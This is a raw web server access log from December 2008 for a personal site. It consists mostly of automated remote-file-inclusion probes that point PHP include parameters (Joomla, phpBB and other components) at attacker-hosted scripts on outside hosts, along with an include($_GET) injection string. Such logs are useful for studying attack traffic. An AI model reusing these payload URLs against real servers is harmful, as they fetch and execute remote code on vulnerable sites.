72.30.87.125 - - [08/Dec/2008:08:00:06 -0800] "GET /logs/?M=A HTTP/1.0" 200 76855 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:08:00:12 -0800] "GET /logs/access_080909.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ragas.baarleweb.net/data/sobi/2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:00:20 -0800] "GET /logs/mcf.php?content=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:00:21 -0800] "GET /mcf.php?content=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:08:00:24 -0800] "GET /logs/access_081114.log%20%20/errors.php?error=http://sior.org/zero/build/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.229.126.149 - - [08/Dec/2008:08:00:35 -0800] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.228.61.175 - - [08/Dec/2008:08:00:51 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&p=37778/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://bengoerz.net/tst.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.76" "www.dmulk.com"
61.19.42.210 - - [08/Dec/2008:08:00:53 -0800] "GET /logs/access_080901.log/mcf.php?content=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.42.210 - - [08/Dec/2008:08:00:58 -0800] "GET /mcf.php?content=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.42.210 - - [08/Dec/2008:08:00:59 -0800] "GET /logs/mcf.php?content=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:01:15 -0800] "GET /logs/access_080427.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://danceofdreams.org//nw/phpbb2/phpBB2/admin/mods/Admin_Userlist_2/processed/log/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:01:28 -0800] "GET /logs/access_080412.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://danceofdreams.org//nw/phpbb2/phpBB2/admin/mods/Admin_Userlist_2/processed/log/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:01:34 -0800] "GET /logs/access_080309.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:01:37 -0800] "GET /logs/access_080606.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:01:37 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:01:37 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.182.84.35 - - [08/Dec/2008:08:01:38 -0800] "GET /logs/access_080520.log%20//includes/include_once.php?include_file=http://www.wutangcorp.de/id6e.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:08:01:45 -0800] "GET /logs/access_080809.log%20%20/errors.php?error=http://sior.org/zero/build/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.182.84.35 - - [08/Dec/2008:08:01:47 -0800] "GET /logs/access_080520.log%20//includes/include_once.php?include_file=http://www.wutangcorp.de/id6e.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.54.16.82 - - [08/Dec/2008:08:02:28 -0800] "GET /logs/access_080223.log/errors.php?error=http://sior.org/zero/build/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:03:00 -0800] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:03:02 -0800] "GET /logs/access_080509.log//faqsupport/samplefaqsupport.php?path[docroot]=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.16.82 - - [08/Dec/2008:08:03:05 -0800] "GET /logs/access_080828.log/errors.php?error=http://sior.org/zero/build/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:03:10 -0800] "GET /logs/access_080503.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:03:11 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:03:11 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.121.162 - - [08/Dec/2008:08:03:30 -0800] "GET /logs/access_080428.log%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.doggytown.de/components/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.121.162 - - [08/Dec/2008:08:03:30 -0800] "GET /logs/access_080501.log%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.doggytown.de/components/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:03:30 -0800] "GET /logs/access_080215.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:03:42 -0800] "GET /logs/access_080512.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:03:43 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:03:43 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:08:03:55 -0800] "GET /logs/access_081016.log/errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:08:03:56 -0800] "GET /errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:08:03:56 -0800] "GET /logs/errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:08:04:03 -0800] "GET /logs/access_081016.log/errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:08:04:03 -0800] "GET /errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:08:04:04 -0800] "GET /logs/errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.155 - - [08/Dec/2008:08:04:26 -0800] "GET /logs/access_080525.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://90plan.ovh.net/~riemai/mambots/search/scr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:04:32 -0800] "GET /logs/access_080515.log/index.php?menu=deti&page=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:04:32 -0800] "GET /logs/index.php?menu=deti&page=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:04:32 -0800] "GET /logs/access_080904.log/index.php?menu=deti&page=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:04:32 -0800] "GET /logs/access_080904.log%20%20/index.php?menu=deti&page=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:04:33 -0800] "GET /logs/access_080514.log%20%20/index.php?menu=deti&page=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:08:04:39 -0800] "GET /logs/index.php?page=http://forum.jj-nds-br.de/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:08:04:40 -0800] "GET /index.php?page=http://forum.jj-nds-br.de/test.txt?? HTTP/1.1" 200 94650 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
195.56.77.155 - - [08/Dec/2008:08:04:45 -0800] "GET /logs/access_080519.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://90plan.ovh.net/~riemai/mambots/search/scr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.97.138 - - [08/Dec/2008:08:04:57 -0800] "GET /logs/access_080109.log HTTP/1.1" 200 621135 "-" "-" "www.dmulk.com"
78.159.97.138 - - [08/Dec/2008:08:04:58 -0800] "GET /logs/access_080118.log HTTP/1.1" 200 561818 "-" "-" "www.dmulk.com"
78.159.97.138 - - [08/Dec/2008:08:04:59 -0800] "GET /logs/access_080120.log HTTP/1.1" 200 585838 "-" "-" "www.dmulk.com"
78.159.97.138 - - [08/Dec/2008:08:04:59 -0800] "GET /logs/access_080117.log HTTP/1.1" 200 670488 "-" "-" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:05:09 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:05:09 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.42.210 - - [08/Dec/2008:08:05:12 -0800] "GET /logs/access_080414.log/mcf.php?content=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:05:29 -0800] "GET /logs/access_080408.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://danceofdreams.org//nw/phpbb2/phpBB2/admin/mods/Admin_Userlist_2/processed/log/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:05:34 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:05:34 -0800] "GET /phphtml.php?htmlclass_path=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:05:35 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.236.88.58 - - [08/Dec/2008:08:05:51 -0800] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://baaaaaa.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.121.162 - - [08/Dec/2008:08:06:25 -0800] "GET /logs/access_080228.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.doggytown.de/components/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:06:26 -0800] "GET /logs/access_080801.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:06:26 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:06:26 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:08:06:44 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:08:06:44 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:08:07:04 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:08:07:05 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:08:07:05 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:08:07:10 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.251.177.84 - - [08/Dec/2008:08:07:16 -0800] "GET /logs/access_081114.log//errors.php?error=http://www.bestmp3.ws/extras/php.ini?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.90.225.108 - - [08/Dec/2008:08:07:26 -0800] "GET /logs/index.php?page=http://forum.jj-nds-br.de/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "dmulk.com"
85.90.225.108 - - [08/Dec/2008:08:07:27 -0800] "GET /index.php?page=http://forum.jj-nds-br.de/test.txt?? HTTP/1.1" 200 94630 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "dmulk.com"
202.64.130.106 - - [08/Dec/2008:08:07:29 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:08:06 -0800] "GET /logs/access_080901.log/mcf.php?content=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:08:06 -0800] "GET /mcf.php?content=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:08:07 -0800] "GET /logs/mcf.php?content=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:08:08:07 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:08:37 -0800] "GET /logs/access_081008.log%20/index.php?_DOCUMENT_ROOT=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:08:37 -0800] "GET /logs/index.php?_DOCUMENT_ROOT=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:08:37 -0800] "GET /index.php?_DOCUMENT_ROOT=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 200 94832 "-" "libwww-perl/5.79" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:08:39 -0800] "GET /logs/index.php?_DOCUMENT_ROOT=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:08:39 -0800] "GET /logs/access_081008.log%20/index.php?_DOCUMENT_ROOT=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:08:40 -0800] "GET /index.php?_DOCUMENT_ROOT=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 200 94832 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:08:42 -0800] "GET /adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:08:44 -0800] "GET /blog/index.php/page/2/ HTTP/1.1" 200 13384 "http://images.google.com/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1124.JPG&imgrefurl=http://dmulk.com/blog/page/2/&usg=__ZYwVKOThL-9DdJgnTgtuPGzUl00=&h=2592&w=3888&sz=3732&hl=en&start=8&tbnid=2BO_RyJdgi3GJM:&tbnh=100&tbnw=150&prev=/images%3Fq%3Dnice%2Bmotorcycles%26imgsz%3Dhuge%26gbv%3D2%26hl%3Den%26rlz%3D1T4GFRD_enUS270US276" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:08:44 -0800] "GET /logs/access_081022.log//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:08:44 -0800] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:08:45 -0800] "GET /adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:08:45 -0800] "GET /logs/access_081109.log//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:08:45 -0800] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:08:52 -0800] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 2359296 "http://images.google.com/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1124.JPG&imgrefurl=http://dmulk.com/blog/page/2/&h=2592&w=3888&sz=3732&tbnid=2BO_RyJdgi3GJM:&tbnh=100&tbnw=150&hl=en&prev=/images%3Fq%3Dnice%2Bmotorcycles%26imgsz%3Dhuge%26gbv%3D2%26hl%3Den%26rlz%3D1T4GFRD_enUS270US276&frame=small" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
86.109.109.21 - - [08/Dec/2008:08:08:57 -0800] "GET /logs/[Scripthttp://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:08:08:58 -0800] "GET /[Scripthttp://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:09:06 -0800] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 3820844 "http://images.google.com/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1124.JPG&imgrefurl=http://dmulk.com/blog/page/2/&h=2592&w=3888&sz=3732&tbnid=2BO_RyJdgi3GJM:&tbnh=100&tbnw=150&hl=en&prev=/images%3Fq%3Dnice%2Bmotorcycles%26imgsz%3Dhuge%26gbv%3D2%26hl%3Den%26rlz%3D1T4GFRD_enUS270US276&frame=small" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
207.59.78.2 - - [08/Dec/2008:08:09:09 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 1.1.4322)" "dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:09:17 -0800] "GET /logs/access_080820.log/phphtml.php?htmlclass_path=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:09:55 -0800] "GET /logs/access_081022.log//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:09:55 -0800] "GET /adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:09:56 -0800] "GET /logs//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:09:57 -0800] "GET /logs/access_081109.log//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
125.141.138.23 - - [08/Dec/2008:08:10:05 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://korea-photo.com/bbs/data/id/test.html?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
125.141.138.23 - - [08/Dec/2008:08:10:05 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://korea-photo.com/bbs/data/id/test.html?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:10:05 -0800] "GET /logs/access_081022.log//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:10:05 -0800] "GET /adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:10:06 -0800] "GET /logs//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.153.41.5 - - [08/Dec/2008:08:10:06 -0800] "GET /logs/access_080525.log/joomla/index.php?option=com_restaurante&task=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.153.41.5 - - [08/Dec/2008:08:10:07 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:10:07 -0800] "GET /logs/access_081109.log//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.153.41.5 - - [08/Dec/2008:08:10:08 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.153.41.5 - - [08/Dec/2008:08:10:20 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:10:27 -0800] "GET /logs/access_081012.log/index.php?_DOCUMENT_ROOT=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
